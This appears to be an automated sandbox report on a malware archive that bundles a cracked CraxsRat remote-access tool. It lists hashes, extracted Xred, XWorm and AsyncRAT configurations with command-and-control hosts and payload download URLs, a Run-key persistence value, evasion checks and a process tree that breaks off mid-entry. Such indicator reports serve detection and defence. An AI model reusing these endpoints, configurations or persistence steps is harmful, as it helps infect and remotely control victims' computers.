Analysis
-
max time kernel
140s -
max time network
158s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
28-12-2024 05:07
General
-
Target
Desktop.rar
-
Size
234.9MB
-
MD5
0ad213221885824bf128991b0295b56e
-
SHA1
6c309febd5dfb98eb58076265fb76e6f24c68e7a
-
SHA256
2066f3e0c9c4ccff79349f9aedfe041766304f08a8e0da981811e87a16832903
-
SHA512
8b9bf6259f26214f0fb55ff22d2134f1b42baa312c684fbbce7a577fce38aa52b59d967ad4364e20309046af2c7bcc1e14f9ac7105c49e19f80329e4f916c6e8
-
SSDEEP
3145728:EEtlRJD0+gmU7zbsNp55EaZkin0PeOO7WsS0ca+E3lNnZT25OH5kN4NQ908t24lh:ECaSdb0iR97vqaV3lNZykkRm0yP8SkR
Malware Config
Extracted
xred
xred.mooo.com
-
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
http://xred.site50.net/syn/SUpdate.ini
https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
http://xred.site50.net/syn/Synaptics.rar
https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
http://xred.site50.net/syn/SSLLibrary.dll
Extracted
xworm
testloggbot23-37268.portmap.host:37268
-
Install_directory
%Userprofile%
-
install_file
2lz.exe
Extracted
asyncrat
0.5.8
Default
newstartagain.servequake.com:6606
newstartagain.servequake.com:7707
newstartagain.servequake.com:8808
newstartagain50.duckdns.org:6606
newstartagain50.duckdns.org:7707
newstartagain50.duckdns.org:8808
Fm255Mv55doc
-
delay
3
-
install
true
-
install_file
System.exe
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/files/0x001900000002ab87-1260.dat family_xworm -
Xred family
-
Xworm family
-
Executes dropped EXE 11 IoCs
pid Process 1216 ExtremeDumper-x86.exe 4652 CraxsRat.exe 3552 ._cache_CraxsRat.exe 4752 Synaptics.exe 964 ._cache_Synaptics.exe 4520 ExtremeDumper.exe 3052 CraxsRat.exe 2604 CraxsRat.exe 2276 CraxsRat.exe 4852 ._cache_CraxsRat.exe 236 2lz.exe -
Loads dropped DLL 24 IoCs
pid Process 1216 ExtremeDumper-x86.exe 1216 ExtremeDumper-x86.exe 1216 ExtremeDumper-x86.exe 4752 Synaptics.exe 4752 Synaptics.exe 4752 Synaptics.exe 4752 Synaptics.exe 4752 Synaptics.exe 4752 Synaptics.exe 4752 Synaptics.exe 4752 Synaptics.exe 4752 Synaptics.exe 4752 Synaptics.exe 4752 Synaptics.exe 4752 Synaptics.exe 4752 Synaptics.exe 4752 Synaptics.exe 4752 Synaptics.exe 4752 Synaptics.exe 4520 ExtremeDumper.exe 2276 CraxsRat.exe 2276 CraxsRat.exe 236 2lz.exe 236 2lz.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\????? = "C:\\ProgramData\\Synaptics\\Synaptics.exe" CraxsRat.exe -
pid Process 1080 powershell.exe 3488 powershell.exe 5204 powershell.exe 2944 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 6 raw.githubusercontent.com 43 raw.githubusercontent.com 50 raw.githubusercontent.com 54 raw.githubusercontent.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ExtremeDumper-x86.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CraxsRat.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_CraxsRat.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CraxsRat.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_CraxsRat.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2lz.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Delays execution with timeout.exe 1 IoCs
pid Process 5744 timeout.exe -
Enumerates system info in registry 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell ExtremeDumper.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0 ExtremeDumper.exe Set value (data) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 ExtremeDumper.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" ExtremeDumper.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" ExtremeDumper.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} ExtremeDumper.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg ExtremeDumper.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" ExtremeDumper.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" ExtremeDumper.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" ExtremeDumper.exe Set value (data) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff ExtremeDumper.exe Set value (data) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 14002e80922b16d365937a46956b92703aca08af0000 ExtremeDumper.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags ExtremeDumper.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" ExtremeDumper.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell ExtremeDumper.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" ExtremeDumper.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg ExtremeDumper.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" ExtremeDumper.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" ExtremeDumper.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 ExtremeDumper.exe Set value (data) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff ExtremeDumper.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" ExtremeDumper.exe Set value (data) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 ExtremeDumper.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" ExtremeDumper.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ ExtremeDumper.exe Set value (data) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 ExtremeDumper.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3 ExtremeDumper.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" ExtremeDumper.exe Set value (data) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff ExtremeDumper.exe Set value (data) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 ExtremeDumper.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" ExtremeDumper.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" ExtremeDumper.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings ExtremeDumper.exe Set value (data) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 ExtremeDumper.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" ExtremeDumper.exe Set value (data) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = 00000000ffffffff ExtremeDumper.exe Set value (data) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 ExtremeDumper.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ CraxsRat.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" ExtremeDumper.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" ExtremeDumper.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "2" ExtremeDumper.exe Set value (data) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe110000008b11c756af18db01029896e0e658db01029896e0e658db0114000000 ExtremeDumper.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "3" ExtremeDumper.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg ExtremeDumper.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" ExtremeDumper.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ CraxsRat.exe Set value (data) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff ExtremeDumper.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" ExtremeDumper.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4 ExtremeDumper.exe Set value (data) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 ExtremeDumper.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" ExtremeDumper.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" ExtremeDumper.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU ExtremeDumper.exe Set value (data) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 ExtremeDumper.exe Set value (data) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff ExtremeDumper.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Synaptics.exe Set value (data) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\MRUListEx = ffffffff ExtremeDumper.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} ExtremeDumper.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" ExtremeDumper.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" ExtremeDumper.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" ExtremeDumper.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic" ExtremeDumper.exe Set value (data) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff ExtremeDumper.exe Set value (data) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 ExtremeDumper.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6140 schtasks.exe 1872 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 764 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 1216 ExtremeDumper-x86.exe 1216 ExtremeDumper-x86.exe 4876 msedge.exe 4876 msedge.exe 3232 msedge.exe 3232 msedge.exe 3148 msedge.exe 3148 msedge.exe 3384 msedge.exe 3384 msedge.exe 4520 ExtremeDumper.exe 4520 ExtremeDumper.exe 4520 ExtremeDumper.exe 4520 ExtremeDumper.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 1216 ExtremeDumper-x86.exe 4520 ExtremeDumper.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
pid Process 3232 msedge.exe 3232 msedge.exe 3384 msedge.exe 3384 msedge.exe 3384 msedge.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeRestorePrivilege 2280 7zFM.exe Token: 35 2280 7zFM.exe Token: SeSecurityPrivilege 2280 7zFM.exe Token: SeDebugPrivilege 1216 ExtremeDumper-x86.exe Token: SeDebugPrivilege 1216 ExtremeDumper-x86.exe Token: SeDebugPrivilege 4520 ExtremeDumper.exe Token: SeDebugPrivilege 4520 ExtremeDumper.exe -
Suspicious use of FindShellTrayWindow 54 IoCs
pid Process 2280 7zFM.exe 2280 7zFM.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3384 msedge.exe 3384 msedge.exe 3384 msedge.exe 3384 msedge.exe 3384 msedge.exe 3384 msedge.exe 3384 msedge.exe 3384 msedge.exe 3384 msedge.exe 3384 msedge.exe 3384 msedge.exe 3384 msedge.exe 3384 msedge.exe 3384 msedge.exe 3384 msedge.exe 3384 msedge.exe 3384 msedge.exe 3384 msedge.exe 3384 msedge.exe 3384 msedge.exe 3384 msedge.exe 3384 msedge.exe 3384 msedge.exe 3384 msedge.exe 3384 msedge.exe 3384 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3232 msedge.exe 3384 msedge.exe 3384 msedge.exe 3384 msedge.exe 3384 msedge.exe 3384 msedge.exe 3384 msedge.exe 3384 msedge.exe 3384 msedge.exe 3384 msedge.exe 3384 msedge.exe 3384 msedge.exe 3384 msedge.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 764 EXCEL.EXE 764 EXCEL.EXE 764 EXCEL.EXE 764 EXCEL.EXE 764 EXCEL.EXE 764 EXCEL.EXE 4520 ExtremeDumper.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4652 wrote to memory of 3552 4652 CraxsRat.exe 86 PID 4652 wrote to memory of 3552 4652 CraxsRat.exe 86 PID 4652 wrote to memory of 3552 4652 CraxsRat.exe 86 PID 4652 wrote to memory of 4752 4652 CraxsRat.exe 87 PID 4652 wrote to memory of 4752 4652 CraxsRat.exe 87 PID 4652 wrote to memory of 4752 4652 CraxsRat.exe 87 PID 4752 wrote to memory of 964 4752 Synaptics.exe 88 PID 4752 wrote to memory of 964 4752 Synaptics.exe 88 PID 4752 wrote to memory of 964 4752 Synaptics.exe 88 PID 964 wrote to memory of 3232 964 ._cache_Synaptics.exe 93 PID 964 wrote to memory of 3232 964 ._cache_Synaptics.exe 93 PID 3232 wrote to memory of 2500 3232 msedge.exe 94 PID 3232 wrote to memory of 2500 3232 msedge.exe 94 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4300 3232 msedge.exe 95 PID 3232 wrote to memory of 4876 3232 msedge.exe 96 PID 3232 wrote to memory of 4876 3232 msedge.exe 96 PID 3232 wrote to memory of 1716 3232 msedge.exe 97 PID 3232 wrote to memory of 1716 3232 msedge.exe 97 PID 3232 wrote to memory of 1716 3232 msedge.exe 97 PID 3232 wrote to memory of 1716 3232 msedge.exe 97 PID 3232 wrote to memory of 1716 3232 msedge.exe 97 PID 3232 wrote to memory of 1716 3232 msedge.exe 97 PID 3232 wrote to memory of 1716 3232 msedge.exe 97 PID 3232 wrote to memory of 1716 3232 msedge.exe 97 PID 3232 wrote to memory of 1716 3232 msedge.exe 97
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Desktop.rar"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2280
-
C:\Users\Admin\Desktop\ExtremeDumper-x86.exe"C:\Users\Admin\Desktop\ExtremeDumper-x86.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1216
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4484
-
C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\CraxsRat.exe"C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\CraxsRat.exe" C:\Users\Admin\Desktop\ExtremeDumper.exe1⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
